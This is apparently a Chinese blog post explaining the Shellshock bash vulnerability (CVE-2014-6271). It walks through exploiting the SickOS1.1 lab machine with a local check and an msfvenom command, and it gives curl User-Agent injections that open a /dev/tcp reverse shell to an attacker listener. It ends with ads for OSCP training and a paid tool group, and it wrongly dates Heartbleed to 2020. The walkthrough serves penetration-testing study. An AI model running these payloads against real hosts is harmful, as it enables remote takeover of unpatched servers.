Shellshock （bash之门）远程代码执行漏洞

❝

由于传播、利用本公众号所提供的信息而造成的任何直接或间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担!如有侵权烦请告知，我们会立即删除并且致歉。谢谢!

一、前言

最近在打靶的时候才了解到这一个漏洞，其针对一些靶机版本比较老的机器特别好用，毕竟是一个Shell的远程代码执行，如果能直接反弹Shell就省去了更多的时间。

• 漏洞编号：CVE-2014-6271

破壳漏洞（ShellShock）的严重性被定义为 10 级（最高）,而2020年 4 月爆发的 OpenSSL(心脏滴血)漏洞才 5 级

二、原理

Bash 4.3以及之前的版本在处理某些构造的环境变量时存在安全漏洞，向环境变量值内的函数定义后添加多余的字符串会触发此漏洞，攻击者可利用此漏洞改变或绕过环境限制，以执行任意的shell命令,甚至完全控制目标系统 受到该漏洞影响的bash使用的环境变量是通过函数名称来调用的，以“(){”开头通过环境变量来定义的。而在处理这样的“函数环境变量”的时候，并没有以函数结尾“}”为结束，而是一直执行其后的shell命令

三、受影响版本

四、验证与利用

（一）本地主机验证方法

env x='() { :;}; echo Shellshock' bash -c "exit"

如果存在输出Shellshock就说明存在漏洞

• 利用

可以远程命令执行就可以反弹shell

msfvenom -p cmd/unix/reverse_bash lhost=192.168.25.132 lport=4444 -f raw

生成一下反弹shell的命令，lhost是攻击者的机器、lport是攻击者的端口

bash -c '0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;/bin/sh <&37 >&37 2>&37'

我们直接用单引号里面的命令就可以了，因为这个漏洞已经是bash环境

env x='() { :;}; 0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;sh <&37 >&37 2>&37' bash -c "exit"

（二）目标主机验证方法

这里以一台靶机为例：SickOS1.1

下载链接:

https://pan.quark.cn/s/4173ca57119e

这里是用nikto扫描到了目标路径暴露出来shellshock漏洞，这里我们直接进行应用

1. 先验证，如果执行并返回了id命令的结果说明存在漏洞

curl -v http://192.168.25.134/cgi-bin/status -H "User-Agent: () { :; }; echo; /usr/bin/id;exit"

这里成功返回结果。

1. 接下来进行利用，反弹shell

(1)先开监听

nc -nvlp 4444

(2)远程执行反弹shell

curl -v http://192.168.25.134/cgi-bin/status -H "User-Agent: () { :; }; echo; 0<&37-;exec 37<>/dev/tcp/192.168.25.132/4444;/bin/sh <&37 >&37 2>&37;exit"

成功连接

总结

一些重要的漏洞我们可以记住，其实用的多了在后面的渗透过程中都会留意都会进行经验积累，其余漏洞利用在我们渗透过程中顺便去查的话也是可以的。

泷羽OSCP火热报名中，详细查看下方内容，FreeBuf帮会也新传了好多工具与资料，后面还会涨价，早进早赚啦！

文章精选

OSCP培训咨询

还在为自己的网安未来焦虑吗，不管是学习渗透技术还是想要实力证明来这儿就对了！！拿到OSCP稳稳红队中级，这就是实力的证明。没有基础也没有关系，边练边学将实战练起来到最后还能把证考了，想要干红队必考必考！！含金量极高，扫描图中二维码或者加下方微信咨询。。

vx：liuyu3366520

内部帮会

可以加入一下我们的帮会，是真正的红队大佬创建的，里面会定时丢些网上没有的工具（比如安卓远控7.4，不过现在已经删除了，有时限，加入的记得看好时间），现在只要99就可以终身，后面人多了就会涨价了

其中：有大量关于网络安全的电子书籍，各个帮会成员全网收集的各付费网安学习资料

还有大量最新公开、内部整理5000+POC合集，优质渗透利用工具。

进入帮会更多精彩内容，优质工具。